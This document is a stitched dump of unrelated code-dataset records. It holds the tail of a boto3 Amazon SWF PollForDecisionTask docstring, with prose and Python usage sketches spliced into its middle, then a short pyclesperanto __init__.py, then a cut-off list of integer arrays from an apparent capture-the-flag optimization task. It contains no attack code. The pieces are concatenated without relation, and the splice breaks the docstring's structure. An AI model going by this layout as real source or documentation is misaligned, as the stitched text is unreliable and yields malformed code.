If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartTimer`` decision for this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelTimerFailedEventAttributes** *(dict) --*
If the event is of type ``CancelTimerFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timerId** *(string) --*
The timerId provided in the ``CancelTimer`` decision that failed.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelTimer`` decision to cancel this timer. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startChildWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``StartChildWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **workflowType** *(dict) --*
The workflow type provided in the ``StartChildWorkflowExecution`` decision that failed.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **workflowId** *(string) --*
The ``workflowId`` of the child workflow execution.
- **initiatedEventId** *(integer) --*
When the ``cause`` is ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is the ID of the ``StartChildWorkflowExecutionInitiated`` event that corresponds to the ``StartChildWorkflowExecution`` decision to start the workflow execution. You can use this information to diagnose problems by tracing back the chain of events leading up to this event.
When the ``cause`` isn't ``WORKFLOW_ALREADY_RUNNING`` , ``initiatedEventId`` is set to ``0`` because the ``StartChildWorkflowExecutionInitiated`` event doesn't exist.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``StartChildWorkflowExecution`` decision to request this child workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **control** *(string) --*
The data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the child workflow execution.
- **lambdaFunctionScheduledEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionScheduled`` event. It isn't set for other event types.
- **id** *(string) --*
The unique ID of the Lambda task.
- **name** *(string) --*
The name of the Lambda function.
- **control** *(string) --*
Data attached to the event that the decider can use in subsequent workflow tasks. This data isn't sent to the Lambda task.
- **input** *(string) --*
The input provided to the Lambda task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker can take to process the Lambda task.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionStartedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionStarted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **lambdaFunctionCompletedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionCompleted`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **result** *(string) --*
The results of the Lambda task.
- **lambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **lambdaFunctionTimedOutEventAttributes** *(dict) --*
Provides the details of the ``LambdaFunctionTimedOut`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``LambdaFunctionStarted`` event that was recorded when this Lambda task started. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduleLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``ScheduleLambdaFunctionFailed`` event. It isn't set for other event types.
- **id** *(string) --*
The ID provided in the ``ScheduleLambdaFunction`` decision that failed.
- **name** *(string) --*
The name of the Lambda function.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in scheduling this Lambda task. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **startLambdaFunctionFailedEventAttributes** *(dict) --*
Provides the details of the ``StartLambdaFunctionFailed`` event. It isn't set for other event types.
- **scheduledEventId** *(integer) --*
The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because the IAM role attached to the execution lacked sufficient permissions. For details and example IAM policies, see `Lambda Tasks <http://docs.aws.amazon.com/amazonswf/latest/developerguide/lambda-task.html>`__ in the *Amazon SWF Developer Guide* .
- **message** *(string) --*
A description that can help diagnose the cause of the fault.
- **previousStartedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event of the previous decision task of this workflow execution that was processed by the decider. This can be used to determine which events in the history are new since the last decision task received by the decider.
- **NextToken** *(string) --*
A token to resume pagination.
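The event attributes described above follow a uniform pattern: each history event carries an ``eventType`` plus exactly one populated ``*EventAttributes`` member, whose key is the event type with a lower-cased first letter and an ``EventAttributes`` suffix. A minimal sketch of dispatching on that pattern; the sample events below are illustrative stand-ins, not real API output:

```python
def attributes_for(event):
    """Return the populated *EventAttributes dict for a history event.

    SWF sets exactly one attributes member per event, named after the
    eventType with a lower-cased first letter plus 'EventAttributes'.
    """
    key = event["eventType"][0].lower() + event["eventType"][1:] + "EventAttributes"
    return event.get(key, {})

# Illustrative events shaped like PollForDecisionTask output (not real data).
events = [
    {"eventId": 5, "eventType": "StartTimerFailed",
     "startTimerFailedEventAttributes": {
         "timerId": "t-1", "cause": "OPERATION_NOT_PERMITTED",
         "decisionTaskCompletedEventId": 4}},
    {"eventId": 6, "eventType": "LambdaFunctionCompleted",
     "lambdaFunctionCompletedEventAttributes": {
         "scheduledEventId": 2, "startedEventId": 3, "result": "ok"}},
]

for event in events:
    attrs = attributes_for(event)
    if attrs.get("cause") == "OPERATION_NOT_PERMITTED":
        # The notes above say this cause indicates missing IAM permissions.
        print(f"event {event['eventId']}: IAM permissions problem")  # → event 5: IAM permissions problem
```

The same helper works for any event type in the response, since the naming convention holds across the attribute members documented in this section.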
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain containing the task lists to poll.
:type taskList: dict
:param taskList: **[REQUIRED]**
Specifies the task list to poll for decision tasks.
The specified string must not start or end with whitespace. It must not contain a ``:`` (colon), ``/`` (slash), ``|`` (vertical bar), or any control characters (``\u0000-\u001f`` | ``\u007f-\u009f`` ). Also, it must not contain the literal string ``arn`` .
- **name** *(string) --* **[REQUIRED]**
The name of the task list.
:type identity: string
:param identity:
Identity of the decider making the request, which is recorded in the ``DecisionTaskStarted`` event in the workflow history. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the events in reverse order. By default the results are returned in ascending order of the ``eventTimestamp`` of the events.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
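A hedged usage sketch for this paginator. The domain, task-list, and identity values are placeholders, and the boto3 call only happens inside `poll_decisions`, so nothing contacts AWS at import time; the pure helper that collects events newer than ``previousStartedEventId`` is demonstrated offline on illustrative pages:

```python
def new_events(pages):
    """Collect events newer than previousStartedEventId across response pages."""
    events, cutoff = [], None
    for page in pages:
        if cutoff is None:
            cutoff = page.get("previousStartedEventId", 0)
        events.extend(e for e in page.get("events", [])
                      if e["eventId"] > cutoff)
    return events

def poll_decisions(domain, task_list_name):
    """Placeholder names; requires AWS credentials and a registered SWF domain."""
    import boto3  # imported lazily so this sketch is safe to import offline
    paginator = boto3.client("swf").get_paginator("poll_for_decision_task")
    pages = paginator.paginate(
        domain=domain,
        taskList={"name": task_list_name},
        identity="example-decider",  # recorded in the DecisionTaskStarted event
        reverseOrder=False,
        PaginationConfig={"PageSize": 100},
    )
    return new_events(pages)

# Offline demonstration with illustrative pages shaped like the response above.
pages = [
    {"previousStartedEventId": 3,
     "events": [{"eventId": 3, "eventType": "DecisionTaskStarted"},
                {"eventId": 4, "eventType": "TimerFired"}]},
    {"events": [{"eventId": 5, "eventType": "DecisionTaskScheduled"}]},
]
print([e["eventId"] for e in new_events(pages)])  # → [4, 5]
```

Filtering on ``previousStartedEventId`` mirrors the field's documented purpose: determining which history events are new since the decider's last decision task.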
36c66cd59789fdee315c89fceb9a718186b5f703 | 138 | py | Python | pyclesperanto_prototype/_tier5/__init__.py | haesleinhuepf/pyclesperanto_prototype | 65bc3035d3b2b61a2722c93b95bae310bfbd190e | ["BSD-3-Clause"] | 1 | 2021-01-15T15:32:19.000Z | 2021-01-15T15:32:19.000Z
] | null | null | null | from ._connected_components_labeling_diamond import connected_components_labeling_diamond
from ._voronoi_labeling import voronoi_labeling
7fcec42a226444d7f6b6f060a6f3498ef90ce7a6 | 215,081 | py | Python | tasks/optimization/inverted_special.py | HackerDom/qctf-starter-2016 | 02fde33d0a9e7f107e787077b26e810de6b8e423 | ["MIT"] | 6 | 2016-12-08T17:35:46.000Z | 2019-12-05T07:17:26.000Z
[13030, 57350, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 24064, 51072, 21984, 46200, 31326, 32201],
[61505, 40934, 23814, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 35840, 17152, 2240, 60464, 46220, 55107, 49216],
[61572, 1857, 3302, 55814, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 13056, 29888, 25392, 22860, 24515],
[27664, 22404, 7745, 31206, 22278, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 18688, 47680, 60560, 10148, 63561, 31810],
[2112, 13328, 48772, 13633, 59110, 54278, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 18944, 8832, 21664, 51752, 40010, 36973],
[16640, 55360, 64528, 9604, 19521, 21478, 20742, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 40704, 16320, 496, 18428, 29343, 47284],
[33792, 16640, 43072, 50192, 35972, 25409, 49382, 52742, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 30208, 11648, 14176, 9944, 17991],
[4096, 33792, 16640, 30784, 35856, 62340, 31297, 11750, 19206, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 50432, 63808, 50256, 64404, 53189, 36374],
[16384, 4096, 33792, 16640, 18496, 21520, 23172, 37185, 39654, 51206, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 30208, 3456, 30560, 2264, 41078, 41937],
[0, 16384, 4096, 33792, 16640, 6208, 7184, 49540, 43073, 2022, 17670, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 15104, 18112, 2992, 30828, 44347, 28904],
[0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 10372, 48961, 29926, 49670, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 51456, 59968, 11408, 21668, 22411],
